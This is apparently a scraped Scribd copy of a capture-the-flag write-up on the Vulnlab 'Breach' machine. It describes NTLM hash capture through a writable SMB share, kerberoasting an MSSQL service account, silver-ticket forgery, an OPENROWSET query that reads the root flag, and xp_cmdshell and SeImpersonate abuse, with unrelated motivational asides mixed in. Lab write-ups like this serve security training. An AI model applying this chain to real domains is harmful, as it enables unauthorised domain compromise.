Scribd
Upload
166 views

Breach - Vulnlab

The document discusses compromising the Breach machine in Vulnlab. It involves phishing credentials from a writable SMB share, kerberoasting the MSSQL service account, and using silver tickets to escalate privileges and compromise the domain controller. The summary discusses key steps like exploiting the SMB share to get initial access, kerberoasting the MSSQL account, using silver tickets to authenticate as Administrator in the MSSQL context, and abusing SeImpersonate privileges to fully compromise the domain controller.

Uploaded by

djiraud
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
166 views

Breach - Vulnlab

The document discusses compromising the Breach machine in Vulnlab. It involves phishing credentials from a writable SMB share, kerberoasting the MSSQL service account, and using silver tickets to escalate privileges and compromise the domain controller. The summary discusses key steps like exploiting the SMB share to get initial access, kerberoasting the MSSQL account, using silver tickets to authenticate as Administrator in the MSSQL context, and abusing SeImpersonate privileges to fully compromise the domain controller.

Uploaded by

djiraud
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

Breach - Vulnlab

Overview
What's good yodie family, its ya boy tobeatelitto here back with another banger. Today were
taking a look at Breach; probably my favorite machine in xct's Vulnlab. It involves phishing a user
through a writeable SMB share, kerberoasting the service account for MSSQL, and abusing
silver tickets to escalate privileges and compromise a DC.

Initial Enumeration

Port 88 and the kerberos service is open so the machine is a domain controller. Aside from that
it looks like a standard windows box, although MSSQL is open which could be interesting.

Anyways we can continue to enumerate services. The web server at http://breach.vl:80


presents a default IIS page, so there is nothing there. We check SMB and it turns out that
anonymous R/W access is available for \\breach.vl\share which I thought was very PECULIAR
PECULIAR PECULIAR PECULIAR PECULIAR.
SMB Share
We can enumerate the share and see that its empty. There is a few usernames we can get from
the folders.

It's probably just a share that the domain users send files to one another from. We can try and
pump it full of file types that can be used to force authentication against our attacker machine
since we have write access, and hopefully some idot will authenticate to us.

On a side note, (and in this situation, doing so unnecessary and irrelevant) you can always
confirm that the users who have directories in the share are valid domain users with kerbrute.
Anyways we generate a bunch of files for our phishing using Greenwolf/ntlm_theft, and
eventually we get a hash back, which we crack. Of course, this (and everything else in this
writeup) is horrible from an OPSEC perspective but whatever im not an operator.

Lateral Movement
With a domain user compromised we have a lot more pathways open to us. We could do a
bloodhound ingest and look for AD abuses, we can look for new SMB shares we may have
access to, we can kerberoast. For the sake of time I'll skip to the correct method forward,
kerberoasting.

High Level Overview of Kerberoasting

We compromise the MSSQL service account.

Yodie family we have everything we need in the present moment you feel me? All that matters is
that we pursue our purpose and mission; but remember family you won't be striving to succeed
on your mission by wasting time thinking about the past or worrying about the future. You wont
find it scrolling though TikTok or Instagram reyel stuffff. Remember that ever day is not going to
be 100%, so its OK to not be perfect, but you still have to stay focused on the mission
gangington fr fr.

Silver Ticket Abuse


Anyhow, since we have now compromised a Service Account, we can abuse silver tickets to
escalate our privileges.

Service accounts (accounts tied to SPNs) are powerful because if someone compromises
them, they can use silver tickets to impersonate any user, in the context of that service.

I will not explain the inner workings of the attack, but xct has a nice blogpost on the theory
behind the attack and ired.team has a nice example of the attack and I recommend you at least
skim them both.

Each service accounts has a different extent to how dangerous they can be, but the MSSQL
service account can lead to the compromise of the machine MSSQL is running on. MSSQL is
running on the DC itself in this case, so have a clear path to both local, and domain admin.
There are 2 extra things we need to create a silver ticket for MSSQL, the NT hash of the service
account, and the domain SID. To get the NT Hash I went here and converted the clear-text
password into the hash, and to get the SID I used enum4linux because I was lazy and didn't
have a bloodhound ingest.

With these, we can use ticketer.py to forge a silver ticket that lets us authenticate as
Administrator in the context of MSSQL.

Anyways there are 2 methods to root from here. It was actually jkr, my second favourite true
german geezer that showed this first method in the vl breach channel. The way was simply to
read the root flag, since MSSQL can read files, and we are allowed to read any files the
Administrator can.
SELECT * FROM OPENROWSET(
BULK N'C:\Users\Administrator\Desktop\root.txt',
SINGLE_CLOB
) as Contents

The second involves a complete compromise.

MSSQL Admin -> Local Admin


They will try everything they can to distract you from the mission with their bad energies type
stuff. A lot of us be thinking a lot of stilly thoughts throughout the day, and its not even our own
thoughts you feel me? Most of the time the thoughts in our mind are not our own, especially
when they're like negative or toxic thoughts. Its really just a reflection of our vibrations you feel
me? But when you raise your vibration you eliminate those negative thoughts gangington.
Reyyyelll stuff.

Back to the box: the first order of business is to get a shell. We are the MSSQL Admin so we can
use xp_cmdshell to execute commands. I like to use hoaxshell because it's pretty stable and
easy to use for when I don't feel like getting out a big C2. Immediately, we see that
SeImpersonate is enabled for our user.

Abusing SeImpersonate is as easy as always:


And that's it. GG.

2023/03/27 ToBeatElite

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy